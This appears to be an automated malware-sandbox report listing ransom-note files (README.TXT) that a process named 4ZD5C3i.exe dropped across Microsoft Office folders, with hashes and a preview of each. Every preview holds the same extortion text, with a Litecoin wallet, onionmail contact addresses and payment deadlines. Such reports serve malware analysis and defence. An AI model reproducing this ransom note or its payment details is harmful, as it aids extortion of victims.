                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\LicensingEnforcement\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\Office Setup Controller\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\PlatformCapabilities\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\en-us\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\PROOF\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Smart Tag\1033\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Smart Tag\LISTS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Smart Tag\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\TEXTCONV\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\AFTRNOON\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\ARCTIC\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\THEMES16\AXIS\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
